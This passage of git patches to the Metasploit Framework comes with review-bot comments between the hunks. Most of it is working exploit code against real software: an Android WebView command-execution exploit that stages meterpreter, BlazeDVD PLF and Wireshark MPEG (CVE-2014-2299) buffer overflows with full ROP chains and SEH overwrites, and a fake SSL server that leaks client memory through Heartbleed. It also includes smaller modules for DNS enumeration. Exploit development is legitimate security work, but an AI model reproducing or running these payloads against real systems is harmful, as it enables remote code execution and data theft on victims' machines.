@@ -119,7 +113,17 @@ class Metasploit3 < Msf::Exploit::Remote def js(arch) stagename = Rex::Text.rand_text_alpha(5) script = %Q| - function exec(obj) { + function exec(runtime, cmdArr) { + var ch = 0; + var output = ''; + var process = runtime.exec(cmdArr); + var input = process.getInputStream(); + + while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } + return output; + } + + function attemptExploit(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } @@ -135,6 +139,19 @@ class Metasploit3 < Msf::Exploit::Remote .getMethod('getRuntime', null) .invoke(null, null); + // now ensure we can write out a hex-encoded byte with the shell's echo builtin + var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']); + if (byte.indexOf("\\\\") > -1) { + // if youre havin byte problems + var xml = new XMLHttpRequest(); + // i feel bad for you son + xml.open('POST', '#{get_module_resource}.msg', false); + // i got \\x63 problems + xml.send("Unsupported shell echo builtin: exploit aborted."); + // but your shell aint one + return true; + } + // libraryData contains the bytes for a native shared object built via NDK // which will load the "stage", which in this case is our android meterpreter stager. // LibraryData is loaded via ajax later, because we have to access javascript in 
@@ -147,9 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote // get the process name, which will give us our data path // $PPID does not seem to work on android 4.0, so we concat pids manually - var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); - var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } + var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; @@ -172,9 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote return true; } - if (!navigator.userAgent.match(/Android 4\.0;/)) { - for (i in top) { if (exec(top[i]) === true) break; } - } + for (i in top) { if (attemptExploit(top[i]) === true) break; } | # remove comments and empty lines From c99f6654e8b81f578cde49d9d4aac4ce44d8d17b Mon Sep 17 00:00:00 2001 From: Ken Smith Date: Fri, 11 Apr 2014 09:59:11 -0400 Subject: [PATCH 100/853] Added target 6.1 to module --- .../windows/fileformat/blazedvd_plf.rb | 96 +++++++++++++++---- 1 file changed, 77 insertions(+), 19 deletions(-) diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 88a82bd8bc..665188f30f 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb 
@@ -12,36 +12,58 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'BlazeDVD 5.1 PLF Buffer Overflow', + 'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in BlazeDVD 5.1. When + This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => + [ + 'MC', + 'Deepak Rathore', + 'Spencer McIntyre', + 'Ken Smith' + ], 'References' => [ [ 'CVE' , '2006-6199' ], - [ 'OSVDB', '30770'], + [ 'EDB', '32737' ], + [ 'OSVDB', '30770' ], [ 'BID', '35918' ], ], 'DefaultOptions' => { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 750, - 'BadChars' => "\x00", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', + 'BadChars' => "\x00\x0a\x1a", + 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ - [ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7 } ], + [ 'BlazeDVD 6.1', + { + 'Payload' => + { + # Stackpivot => add esp,0xfffff254 + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" + } + } + ], + [ 'BlazeDVD 5.1', + { + 'Ret' => 0x100101e7, + 'Payload' => + { + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper + } + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 03 2009', 
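Review bot: The module `'Name'` now reads `BlazeDVD 6.1 PLF Buffer Overflow`, although the description and the `Targets` list in this same hunk still cover 5.1 as well, so anything keyed on the module name (search, reports, coverage mapping) will not show the older version. `'Name' => 'BlazeDVD 5.1/6.1 PLF Buffer Overflow'` would agree with the rest of the metadata. The rewritten description line still says `stack over flow`; `stack overflow` can be fixed in the same edit.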
@@ -49,22 +71,58 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']), ], self.class) end + def rop_chain + # rop chain generated with mona.py - www.corelan.be + case target.name + when 'BlazeDVD 6.1' + rop_gadgets = [ ] + # 0x6162e802 RETN (ROP NOP) [EPG.dll] + rop_gadgets.fill(0x6162e802, 0..7) + rop_gadgets += [ + 0x6411437d, # POP EAX # RETN [NetReg.dll] + 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] + 0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll] + 0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll] + 0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll] + 0x6032b8bb, # POP EAX # RETN [Configuration.dll] + 0xfffffcff, # Value to negate, will become 0x00000301 + 0x61627d9c, # NEG EAX # RETN [EPG.dll] + 0x61640124, # XCHG EAX,EBX # RETN [EPG.dll] + 0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll] + 0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll] + 0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll] + 0x1001514c, # &Writable location [SkinScrollBar.Dll] + 0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll] + 0x6162e802, # RETN (ROP NOP) [EPG.dll] + 0x64106f33, # POP EAX # RETN [NetReg.dll] + 0x90909090, # nop + 0x6031d582, # PUSHAD # RETN [Configuration.dll] + ] + end + return rop_gadgets.flatten.pack("V*") + end + def exploit - - plf = rand_text_alpha_upper(6024) - - plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') - plf[876,12] = make_nops(12) - plf[888,payload.encoded.length] = payload.encoded + case target.name + when 'BlazeDVD 5.1' + plf = rand_text_alpha_upper(6024) + plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') + plf[876,12] = make_nops(12) + 
plf[888,payload.encoded.length] = payload.encoded + when 'BlazeDVD 6.1' + plf = rand_text_alphanumeric(260) + plf << rop_chain + plf << payload.encoded + end print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(plf) - end end From b95fcb961027c13e4af961479687401b21670c54 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Sat, 12 Apr 2014 04:21:35 -0300 Subject: [PATCH 101/853] Use the protocol version sent by the client Use the protocol version sent by the client. This should be the latest version supported by the client, which may also be the only acceptable. This makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282). --- .../server/openssl_heartbeat_client_memory.rb | 31 +++++++------------ 1 file changed, 12 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index cc6a75cd86..574c24810f 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is - hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher. + hardcoded for using the AES-128-CBC-SHA1 cipher. }, 'Author' => [ 
@@ -160,19 +160,12 @@ class Metasploit3 < Msf::Auxiliary print_status("#{@state[c][:name]} Processing Client Hello...") - # Ignore clients that do not support heartbeat requests - unless data.index("\x0F\x00\x01\x01") - print_status("#{@state[c][:name]} Client does not support heartbeats") - c.close - return - end - # Extract the client_random needed to compute the master key @state[c][:client_random] = data[11,32] @state[c][:received_hello] = true print_status("#{@state[c][:name]} Sending Server Hello...") - openssl_send_server_hello(c, data) + openssl_send_server_hello(c, data, message_version) return end @@ -203,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary else # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, message_version) end # Process cleartext heartbeat replies @@ -244,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, message_version) end # Process heartbeat replies @@ -305,14 +298,14 @@ class Metasploit3 < Msf::Auxiliary end # Send an OpenSSL Server Hello response - def openssl_send_server_hello(c, hello) + def openssl_send_server_hello(c, hello, version) # Create the Server Hello response extensions = "\x00\x0f\x00\x01\x01" # Heartbeat server_hello_payload = - "\x03\x02" + # TLS Version 1.1 + [version].pack('n') + # Use the protocol version sent by the client. @state[c][:server_random] + # Random (Timestamp + Random Bytes) "\x00" + # Session ID "\x00\x2F" + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) 
@@ -321,31 +314,31 @@ class Metasploit3 < Msf::Auxiliary server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload - msg1 = "\x16\x03\x02" + [server_hello.length].pack("n") + server_hello + msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello c.put(msg1) # Skip the rest of TLS if we arent negotiating it unless negotiate_tls? # Send a heartbeat request to start the stream and return - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, version) return end # Certificates certs_combined = generate_certificates pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined - msg2 = "\x16\x03\x02" + [pay2.length].pack("n") + pay2 + msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2 c.put(msg2) # End of Server Hello pay3 = "\x0e\x00\x00\x00" - msg3 = "\x16\x03\x02" + [pay3.length].pack("n") + pay3 + msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3 c.put(msg3) end # Send the heartbeat request that results in memory exposure - def openssl_send_heartbeat(c) - c.put "\x18\x03\x02\x00\x03\x01" + [heartbeat_read_size].pack("n") + def openssl_send_heartbeat(c, version) + c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n") end # Pack the certificates for use in the TLS reply From 039946e8d17f32dbe3a20a8e458f8c23546bceb2 Mon Sep 17 00:00:00 2001 
From: Ramon de C Valle Date: Sat, 12 Apr 2014 05:05:14 -0300 Subject: [PATCH 102/853] Use the first cipher suite sent by the client If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the first cipher suite sent by the client. This complements the last commit and makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282). --- .../server/openssl_heartbeat_client_memory.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index 574c24810f..e57c9724c3 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -300,6 +300,14 @@ class Metasploit3 < Msf::Auxiliary # Send an OpenSSL Server Hello response def openssl_send_server_hello(c, hello, version) + # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the + # first cipher suite sent by the client. + if @state[c][:encrypted] + cipher = "\x00\x2F" + else + cipher = hello[46, 2] + end + # Create the Server Hello response extensions = "\x00\x0f\x00\x01\x01" # Heartbeat @@ -308,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary [version].pack('n') + # Use the protocol version sent by the client. @state[c][:server_random] + # Random (Timestamp + Random Bytes) "\x00" + # Session ID - "\x00\x2F" + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) + cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) "\x00" + # Compression Method (none) [extensions.length].pack('n') + extensions From d493c48cc6bafe23d9fdf0ad262e4facfe3a2add Mon Sep 17 00:00:00 2001 
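Review bot: `cipher = hello[46, 2]` in the @@ -300 hunk relies on an undocumented layout assumption: offset 46 is the first offered cipher suite only when the Client Hello carries a zero-length session ID, and the slice is `nil` for a hello shorter than that. The added comment should state this, for example `# offset 46 assumes a zero-length session_id; hello must be at least 48 bytes`. In the @@ -308 hunk the trailing comment `# Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)` is now stale, because `cipher` may hold the client's suite; `# Cipher ID (client's first suite unless encrypted)` describes the new behaviour. The body of `openssl_send_server_hello` continues outside both hunks.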
From: Thanat0s Date: Sat, 12 Apr 2014 16:36:18 +0200 Subject: [PATCH 103/853] add thottling,notes insert and output to dns_rev_lookup --- .../auxiliary/gather/dns_reverse_lookup.rb | 46 ++++++++++++++++--- 1 file changed, 39 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index dc0b0167d2..aabf1c9bb1 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -12,26 +12,29 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup Enumeration', - 'Description' => %q{ + 'Name' => 'DNS Reverse Lookup Enumeration', + 'Description' => %q{ This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ' ], - 'License' => BSD_LICENSE + 'Author' => [ 'Carlos Perez ', # Base code + 'Thanat0s '], # Output, Throttling & Db notes add + 'License' => BSD_LICENSE )) register_options( [ OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.']), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]) + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), + OptString.new('OUT_FILE', [ false, "Specify a CSV output file" ]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]) + OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]), + OptInt.new('THROTTLE', [ false, "Specify the resolution throttle in query per sec. 0 means unthrottled",0 ]) ], self.class) end 
@@ -55,21 +58,50 @@ class Metasploit3 < Msf::Auxiliary print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] + # Basic Throttling + sleep_time = 0.0 + if (datastore['THROTTLE'] != 0) + sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] + print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") + end + # Output.. + if datastore['OUT_FILE'] + print_status("Scan result saved in #{datastore['OUT_FILE']}") + open(datastore['OUT_FILE'], 'w') do |f| + f.puts "; IP, Host" + end + end while (true) # Spawn threads for each host while (tl.length <= @threadnum) ip = ar.next_ip + hosts = Array.new break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin + sleep(sleep_time) query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") + print_status("#Host Name: #{addresstp}, IP Address: #{tip.to_s}") + if datastore['OUT_FILE'] + open(datastore['OUT_FILE'], 'a') do |f| + f.puts "#{tip.to_s},#{addresstp}" + end + end report_host( :host => tip.to_s, :name => addresstp ) + hosts.push addresstp end + if !hosts.empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts + ) + end + hosts = Array.new rescue ::Interrupt raise $! rescue ::Rex::ConnectionError From dd7bceee56b23a71d376ebfd0c1dc00a557dca16 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Sat, 12 Apr 2014 17:43:39 +0200 Subject: [PATCH 104/853] fix threaded issues --- .../auxiliary/gather/dns_reverse_lookup.rb | 23 +++++++++++-------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index aabf1c9bb1..d8722ab01f 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
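Review bot: Both file writes go through `Kernel#open` on the raw `OUT_FILE` string, which treats a value beginning with `|` as a command to spawn rather than a path; `File.open(datastore['OUT_FILE'], 'a') do |f|` (and the `'w'` variant for the header) removes that behaviour. The row itself, `f.puts "#{tip.to_s},#{addresstp}"`, writes a PTR name taken from a DNS answer without any quoting, so a name containing a comma, quote or leading `=` corrupts the CSV or is interpreted as a formula by a spreadsheet. The stdlib `CSV` writer or explicit quoting of both fields would be safer. The appends also happen from several spawned threads with no lock, so a `Mutex` around the write is worth adding. The enclosing method starts and ends outside this hunk.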
@@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary end while (true) # Spawn threads for each host + hosts = Hash.new while (tl.length <= @threadnum) ip = ar.next_ip - hosts = Array.new break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin @@ -92,16 +92,21 @@ class Metasploit3 < Msf::Auxiliary :host => tip.to_s, :name => addresstp ) - hosts.push addresstp + if !hosts[tip] + hosts[tip] = Array.new + end + hosts[tip].push addresstp end - if !hosts.empty? - report_note( - :host => tip.to_s, - :type => "RDNS_Record", - :data => hosts - ) + + if hosts[tip] + if !hosts[tip].empty? + report_note( + :host => tip.to_s, + :type => "RDNS_Record", + :data => hosts[tip] + ) + end end - hosts = Array.new rescue ::Interrupt raise $! rescue ::Rex::ConnectionError From da26a3963461aa9bf11f60ce10502299fe215680 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:16:10 +0100 Subject: [PATCH 105/853] Add CVE-2014-2219 exploit for windows XP SP3 --- .../windows/misc/wireshark_mpeg_overflow.rb | 118 ++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_mpeg_overflow.rb diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb new file mode 100644 index 0000000000..f26a6dd311 --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb 
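Review bot: `hosts` is now one `Hash` shared by every spawned thread and mutated (`hosts[tip] = Array.new`, `hosts[tip].push addresstp`) without synchronisation, and the first hunk reassigns it with `hosts = Hash.new` on each pass of the outer `while (true)` loop. Because the thread blocks close over the variable rather than the object, a thread still running when the loop comes round again would see the fresh hash and silently lose the names it had collected. Whether that can happen depends on how the loop waits for `tl`, which is outside the hunk. A per-thread local avoids the question entirely: start the block with `names = []`, use `names << addresstp` inside `each_ptr`, and call `report_note(:host => tip.to_s, :type => "RDNS_Record", :data => names) unless names.empty?`.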
@@ -0,0 +1,118 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', + 'Description' => %q{ + This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 + by sending an malicious packet.) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2014-2299'], + [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], + [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], + [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'BadChars' => "\xff\x00", + 'Space' => 600, + 'DisableNops' => 'True', + 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'WinXP SP3 Spanish (bypass DEP)', + { + 'OffSet' => 70692, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 20 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']), + ], self.class) + end + + def junk + return rand_text(4).unpack("L")[0].to_i + end + def create_rop_chain() + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] + 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] + 0x64f94ba1, # POP 
EBP # RETN [libfontconfig-1.dll] + 0x63cd04f1, # & push esp # ret [liblzma-5.dll] + 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x00000201, # 0x00000201-> ebx + 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x00000040, # 0x00000040-> edx + 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x668242b9, # &Writable location [libgnutls-26.dll] + 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] + 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x90909090, # nop + 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + ].flatten.pack("V*") + + return rop_gadgets + + end + + def exploit + + print_status("Creating '#{datastore['FILENAME']}' file ...") + magic_header = "\xff\xfb" # mpeg magic_number + packet = pattern_create(892) + ropchain = create_rop_chain + packet << ropchain + packet << payload.encoded # Shellcode + packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + # SEH pointers overwrite (nseh & seh) + packet << "\x90\x90\x90\x90" # nseh + # 0xff is badchar then we can't make a jump back with jmp $-2000 + # After nseh and seh we haven't space, then we have to jump to another location. + # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA + packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + print_status("Preparing payload") + filecontent = magic_header + filecontent << packet + print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") + file_create(filecontent) + + end +end From e811e169dcf0bdb87900bfd2c0962f065b9a097a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:31:54 +0100 Subject: [PATCH 106/853] Cambios en el exploit --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
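Review bot: The module metadata does not match what the code does: it mixes in `Msf::Exploit::FILEFORMAT` and ends in `file_create`, yet the name says "(remote)" and the description says the overflow is triggered "by sending an malicious packet.)", with a stray closing parenthesis. The commit subject cites CVE-2014-2219 while the reference entry is `[ 'CVE', '2014-2299']`; one of the two is presumably a typo, and they should be reconciled so the module maps to the right advisory. `junk` is defined but never called in this file and can be dropped. `'DisableNops' => 'True'` passes a string where the boolean `true` was presumably intended.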
diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index f26a6dd311..6ae406ef0c 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by sending an malicious packet.) + by generating an malicious file.) }, 'License' => MSF_LICENSE, 'Author' => [ + 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => From 2aecab89bbdafea44db2c10a7fa69968dab39dec Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 14 Apr 2014 11:00:41 -0500 Subject: [PATCH 107/853] 14-day free trial banner for non-binary installs --- lib/msf/ui/console/command_dispatcher/core.rb | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..8237fd1682 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -406,6 +406,14 @@ class Core avdwarn = nil banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n" + + # Direct the user to the 14-day free trial of Metasploit Pro unless + # they are on an apt install or already using Metasploit Pro, + # Express, or Community edition + unless binary_install + banner << "+ -- --=[ 14-Day free trial: http://metasploit.pro ]" + end + if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n" @@ -3040,6 +3048,18 @@ class Core File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end + # Determines if we're a Metasploit Pro/Community/Express + # installation or a tarball/git checkout + # + # @return [Boolean] true if we are a binary install + def binary_install + binary_paths = [ + 'C:/metasploit/apps/pro/msf3', + '/opt/metasploit/apps/pro/msf3' + ] + return binary_paths.include? Msf::Config.install_root + end + # # Module list enumeration # From 176204d62d77838234c12a23de03bf5294bd6e7a Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 14 Apr 2014 21:11:04 +0200 Subject: [PATCH 108/853] With implemented remarks --- .../auxiliary/gather/dns_reverse_lookup.rb | 29 +++++++++---------- 1 file changed, 13 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index d8722ab01f..129da312d8 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb 
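Review bot: The new banner line has no trailing newline, unlike the line above it, so the `svn r...` line appended a few lines further down ends up on the same row whenever both conditions hold. Writing it as `banner << "+ -- --=[ 14-Day free trial: http://metasploit.pro ]\n"` fixes the layout. Since the banner points users at a download site, an `https://` URL would be preferable if the site serves one. The enclosing banner method starts and ends outside the hunk.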
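Review bot: `binary_install` decides by exact string equality, `binary_paths.include? Msf::Config.install_root`, so a trailing separator, a different drive-letter case or backslashes in the configured root would make a packaged install look like a source checkout; normalising both sides first (for example with `File.expand_path` and a case-insensitive compare on Windows) is more robust. As a predicate it would conventionally be named `binary_install?`, with the caller in the first hunk updated to match, and the explicit `return` is unnecessary. The doc comment could state that only these two default install locations are recognised.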
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary This module performs DNS reverse lookup against a given IP range in order to retrieve valid addresses and names. }, - 'Author' => [ 'Carlos Perez ', # Base code - 'Thanat0s '], # Output, Throttling & Db notes add + 'Author' => [ 'Carlos Perez ', # Base code + 'Thanat0s '], # Output, Throttling & Db notes add 'License' => BSD_LICENSE )) @@ -58,11 +58,11 @@ class Metasploit3 < Msf::Auxiliary print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] - # Basic Throttling + # Basic Throttling sleep_time = 0.0 if (datastore['THROTTLE'] != 0) sleep_time = (1.0/datastore['THROTTLE'])/datastore['THREADS'] - print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") + print_status("Throttle set to #{datastore['THROTTLE']} queries per seconds") end # Output.. if datastore['OUT_FILE'] @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Auxiliary break if not ip tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip| begin - sleep(sleep_time) + Rex.sleep(sleep_time) query = @res.query(tip) query.each_ptr do |addresstp| - print_status("#Host Name: #{addresstp}, IP Address: #{tip.to_s}") + print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") if datastore['OUT_FILE'] open(datastore['OUT_FILE'], 'a') do |f| f.puts "#{tip.to_s},#{addresstp}" @@ -92,20 +92,17 @@ class Metasploit3 < Msf::Auxiliary :host => tip.to_s, :name => addresstp ) - if !hosts[tip] + if 